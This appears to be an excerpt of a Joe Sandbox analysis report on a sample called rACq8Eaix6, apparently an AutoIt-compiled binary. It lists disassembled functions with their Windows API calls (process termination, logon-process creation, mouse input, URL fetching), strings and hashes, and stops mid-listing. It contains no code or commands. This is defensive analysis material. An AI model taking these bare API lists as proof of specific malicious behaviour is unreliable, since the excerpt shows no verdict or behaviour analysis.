ShowWindow.USER32(00C957B0,00000000,017E5450,?,?,00C957B0,?,00C5B5A8,?,?), ref: 00C5B796
ShowWindow.USER32(00000000,00000004,?,00C5B5A8,?,?), ref: 00C5B7A8
EnableWindow.USER32(00000000,00000001), ref: 00C5B7CC
SendMessageW.USER32(?,0000130C,?,00000000), ref: 00C5B7EF

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 1cdf290b1dcdb0b66a5484fcb438587244b84484121c704f6be78b59d3bc2641
Instruction ID: 3dc81fa73fce8f5322cf2860193e49fa6e0dbb3bbeecfbb551658d0db0d2c2a6
Opcode Fuzzy Hash: 1cdf290b1dcdb0b66a5484fcb438587244b84484121c704f6be78b59d3bc2641
Instruction Fuzzy Hash: 0F417238600240AFDB25CF24C499B947FE0FF49352F1841A9FD588F6A2C731AD9ACB64

Function 00C4709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00C44E41,?,?,00000000,00000001), ref: 00C470AC

Part of subcall function 00C439A0: GetWindowRect.USER32(?,?), ref: 00C439B3

GetDesktopWindow.USER32 ref: 00C470D6
GetWindowRect.USER32(00000000), ref: 00C470DD
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00C4710F

Part of subcall function 00C35244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C352BC

GetCursorPos.USER32(?), ref: 00C4713B
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00C47199

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 9fce52428a72994845edb348181a42fcedd06b61d4f4f0fbb80d573917b45054
Instruction ID: 345e2de78cd918b53a4c543617b1ab0e033883402782f7249d52799725565709
Opcode Fuzzy Hash: 9fce52428a72994845edb348181a42fcedd06b61d4f4f0fbb80d573917b45054
Instruction Fuzzy Hash: F131F272108305ABD724DF14C849F9FB7A9FF88304F000A19F499A7191DB30EA49CB92

Function 00C28879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C280A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C280C0
Part of subcall function 00C280A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C280CA
Part of subcall function 00C280A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C280D9
Part of subcall function 00C280A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C280E0
Part of subcall function 00C280A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C280F6

GetLengthSid.ADVAPI32(?,00000000,00C2842F), ref: 00C288CA
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00C288D6
HeapAlloc.KERNEL32(00000000), ref: 00C288DD
CopySid.ADVAPI32(00000000,00000000,?), ref: 00C288F6
GetProcessHeap.KERNEL32(00000000,00000000,00C2842F), ref: 00C2890A
HeapFree.KERNEL32(00000000), ref: 00C28911

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 38e4d77065df9e2ec1d5231fab664ae592a3485d4f552aab0cd70e1a78c0cd24
Instruction ID: cbc92852d812076d029a073cf76c5a8ae9ded92d38560519b64f11d139dca5cb
Opcode Fuzzy Hash: 38e4d77065df9e2ec1d5231fab664ae592a3485d4f552aab0cd70e1a78c0cd24
Instruction Fuzzy Hash: 6111B135502619FFDB14AFA4EC09BBF7768EB44312F14802DE895E7150CB329E89DB60

Function 00C285B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00C285E2
OpenProcessToken.ADVAPI32(00000000), ref: 00C285E9
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00C285F8
CloseHandle.KERNEL32(00000004), ref: 00C28603
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C28632
DestroyEnvironmentBlock.USERENV(00000000), ref: 00C28646

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 0e661168268eb8e30d8084b5307a956caa50d79e90161673efbf7bd66655e820
Instruction ID: a1d2671309b7458857ecac50b70cedc0450bcdb51319ad04b26def81c54c9c85
Opcode Fuzzy Hash: 0e661168268eb8e30d8084b5307a956caa50d79e90161673efbf7bd66655e820
Instruction Fuzzy Hash: B2116D7650120DABEF028FA4ED49FDE7BA9EF48345F044069FE04A2161C7719E65DB60

Function 00C2B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00C2B7B5
GetDeviceCaps.GDI32(00000000,00000058), ref: 00C2B7C6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C2B7CD
ReleaseDC.USER32(00000000,00000000), ref: 00C2B7D5
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00C2B7EC
MulDiv.KERNEL32(000009EC,?,?), ref: 00C2B7FE

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 3d007c35f9c0e4c76342184d0a4cdd336e4474c7855a9439be116142bf59b833
Instruction ID: 698322626ea8d4c0b28205f6875f9ce63866e521baeeb3df375d00b4bf1627ac
Opcode Fuzzy Hash: 3d007c35f9c0e4c76342184d0a4cdd336e4474c7855a9439be116142bf59b833
Instruction Fuzzy Hash: 59018475E00319BBEB109BA69C45B5FBFB8EB48711F004079FA04E7291DA309D01CFA0

Function 00BF0162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00BF0193
MapVirtualKeyW.USER32(00000010,00000000), ref: 00BF019B
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00BF01A6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00BF01B1
MapVirtualKeyW.USER32(00000011,00000000), ref: 00BF01B9
MapVirtualKeyW.USER32(00000012,00000000), ref: 00BF01C1

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: b8b1e9bd40fb1202c412989d1d74d56a4431e5c0a11e0164891affc4be6eddb1
Instruction ID: 843074d923964be64fffcacb9eb88551986d814cff307867985f30ae20d61842
Opcode Fuzzy Hash: b8b1e9bd40fb1202c412989d1d74d56a4431e5c0a11e0164891affc4be6eddb1
Instruction Fuzzy Hash: 3E0148B09017597DE3009F5A8C85B56FEA8FF19354F00411BA15847941C7B5A864CBE5

Function 00C353E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C353F9
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00C3540F
GetWindowThreadProcessId.USER32(?,?), ref: 00C3541E
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C3542D
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C35437
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C3543E

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 88360f7c1a4c0d0cdfd2417090846f4218a74ae83d3d115ec52533fb8952c73c
Instruction ID: ea4793dd4308d85e238172fc98ddb9b7a0b5064bc1e50170c9ee0137f34f2179
Opcode Fuzzy Hash: 88360f7c1a4c0d0cdfd2417090846f4218a74ae83d3d115ec52533fb8952c73c
Instruction Fuzzy Hash: DDF01235141658BBE7255B529C0DFAF7B7CEBC6B12F00016DFA04E10619AA11A4286B5

Function 00C37230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00C37243
EnterCriticalSection.KERNEL32(?,?,00BE0EE4,?,?), ref: 00C37254
TerminateThread.KERNEL32(00000000,000001F6,?,00BE0EE4,?,?), ref: 00C37261
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00BE0EE4,?,?), ref: 00C3726E

Part of subcall function 00C36C35: CloseHandle.KERNEL32(00000000,?,00C3727B,?,00BE0EE4,?,?), ref: 00C36C3F

InterlockedExchange.KERNEL32(?,000001F6), ref: 00C37281
LeaveCriticalSection.KERNEL32(?,?,00BE0EE4,?,?), ref: 00C37288

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 9dd18fa6116d0422dbc67d0c3100ef37576dd634ef5384019f47e2c4acc63e26
Instruction ID: 06eadbe8fb9ff7f41e631ac321f1882f6fb1e9e37013fdca51dfe8294209ee10
Opcode Fuzzy Hash: 9dd18fa6116d0422dbc67d0c3100ef37576dd634ef5384019f47e2c4acc63e26
Instruction Fuzzy Hash: F7F03ABA541712EBDB162B64ED4CBDF7729EF45703F100639F503A14A1CB765982CA50

Function 00C28992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C2899D
UnloadUserProfile.USERENV(?,?), ref: 00C289A9
CloseHandle.KERNEL32(?), ref: 00C289B2
CloseHandle.KERNEL32(?), ref: 00C289BA
GetProcessHeap.KERNEL32(00000000,?), ref: 00C289C3
HeapFree.KERNEL32(00000000), ref: 00C289CA

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 4ce687b36424ba8ff0cdcc0752b512a3485f1499abd85f2e9e82413cd6ed8f54
Instruction ID: 1668f2b5457cb3485e47399f7376869c5852693487fe536dc82e2b48552fd737
Opcode Fuzzy Hash: 4ce687b36424ba8ff0cdcc0752b512a3485f1499abd85f2e9e82413cd6ed8f54
Instruction Fuzzy Hash: BCE0C93A004601FBDA052FE1EC0CB1EBB69FB893637104234F21591470CB3254A2DB50

Function 00C485ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C48613
CharUpperBuffW.USER32(?,?), ref: 00C48722
VariantClear.OLEAUT32(?), ref: 00C4889A

Part of subcall function 00C37562: VariantInit.OLEAUT32(00000000), ref: 00C375A2
Part of subcall function 00C37562: VariantCopy.OLEAUT32(00000000,?), ref: 00C375AB
Part of subcall function 00C37562: VariantClear.OLEAUT32(00000000), ref: 00C375B7

Strings

Incorrect Parameter format, xrefs: 00C4864B, 00C4880D
AUTOIT.ERROR, xrefs: 00C48728

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 8a38a0c6966972f64f43013b09a77d294a385bb661cdc3f9bc44ecb703164142
Instruction ID: ab7549f63343cfccdf659ee4d7d986cf9034e54a5ad173dbe10ec16f508fcde7
Opcode Fuzzy Hash: 8a38a0c6966972f64f43013b09a77d294a385bb661cdc3f9bc44ecb703164142
Instruction Fuzzy Hash: 49917C75A043019FC710EF24C48495EBBE4FF89714F14896EF89A9B361DB31E949CB92

Function 00C32A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BEFC86: _wcscpy.LIBCMT ref: 00BEFCA9

_memset.LIBCMT ref: 00C32B87
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C32BB6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C32C69
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00C32C97

Strings

0, xrefs: 00C32B73

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: c0be5ed29fd9049841f7af0dc98a8effcd81d05faa2d00358121e5214c9d9667
Instruction ID: d84b46c69d397610f99d30145c6d707df66bc5723cc0b280c2858028ca313331
Opcode Fuzzy Hash: c0be5ed29fd9049841f7af0dc98a8effcd81d05faa2d00358121e5214c9d9667
Instruction Fuzzy Hash: 7951D0715283009BEF25AF28E845A6FB7E4EF49350F141A2DF8A5D32A1DB70CE44D752

Function 00C2D56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C2D5D4
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00C2D60A
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00C2D61B
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00C2D69D

Strings

DllGetClassObject, xrefs: 00C2D610

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 34c1cc4ebdbccd2d8a6a4d08c94184d371bdca1faf4ddeb86023c1cb16a9100e
Instruction ID: 2ad5a552f2403866876efc62b29be58663242640fc9a9a379a5dbc89424f5b6e
Opcode Fuzzy Hash: 34c1cc4ebdbccd2d8a6a4d08c94184d371bdca1faf4ddeb86023c1cb16a9100e
Instruction Fuzzy Hash: 7541AFB1600214EFDB14CF24D888B9A7BB9EF64310F1185ADBC0A9F605D7B0DA84CBA0

Function 00C32753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C327C0
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00C327DC
DeleteMenu.USER32(?,00000007,00000000), ref: 00C32822
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00C95890,00000000), ref: 00C3286B

Strings

0, xrefs: 00C327B5

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: f46dcb76f02403d3e5bece8df88f8d5a27d20bf4a382f8641f3a6674d25a5e1d
Instruction ID: afb8de4bc83f8d4d00d0f2a8fe3a6bd3359ee0f0861e9eac365433c0cf03c6e6
Opcode Fuzzy Hash: f46dcb76f02403d3e5bece8df88f8d5a27d20bf4a382f8641f3a6674d25a5e1d
Instruction Fuzzy Hash: C841B2712143019FDB24DF24C844F5ABBE8EF85314F14496EF9A5972D1D730E905CB52

Function 00C4D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00C4D7C5

Part of subcall function 00BD784B: _memmove.LIBCMT ref: 00BD7899

Strings

winapi, xrefs: 00C4D836
cdecl, xrefs: 00C4D81C
none, xrefs: 00C4D8A0
stdcall, xrefs: 00C4D847

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 6a48683efa3381709e8623dcbc818737eaa043917cd220117a2d467cb6ede028
Instruction ID: 380f2d880f55579d44b14f59add3b28ce6d27b32a38f62a24fb9d56da26e4fe2
Opcode Fuzzy Hash: 6a48683efa3381709e8623dcbc818737eaa043917cd220117a2d467cb6ede028
Instruction Fuzzy Hash: 15318E71904619ABCF00EF59C8519FEB7F5FF14324B10866AF826977D1EB31A905CB80

Function 00C28E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BD7DE1: _memmove.LIBCMT ref: 00BD7E22

Part of subcall function 00C2AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C2AABC

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00C28F14
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00C28F27
SendMessageW.USER32(?,00000189,?,00000000), ref: 00C28F57

Part of subcall function 00BD7BCC: _memmove.LIBCMT ref: 00BD7C06

Strings

ComboBox, xrefs: 00C28E9E
ListBox, xrefs: 00C28ED3

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: 3d49d9de71ba07f06eac776aced9f6acd1c46a4e3d91982dbf63e479ce7fd79f
Instruction ID: a7d228ae25cea193bd8b8d353454267b1044f9ee8c9950eeeafedcf1e6b2449d
Opcode Fuzzy Hash: 3d49d9de71ba07f06eac776aced9f6acd1c46a4e3d91982dbf63e479ce7fd79f
Instruction Fuzzy Hash: 5C210475A41108BADB14ABB0DC85DFFB7B9DF05320F14412AF821A72E1EF39494E9620

Function 00C4182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C4184C
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C41872
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C418A2
InternetCloseHandle.WININET(00000000), ref: 00C418E9

Part of subcall function 00C42483: GetLastError.KERNEL32(?,?,00C41817,00000000,00000000,00000001), ref: 00C42498
Part of subcall function 00C42483: SetEvent.KERNEL32(?,?,00C41817,00000000,00000000,00000001), ref: 00C424AD

Strings

, xrefs: 00C41893

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
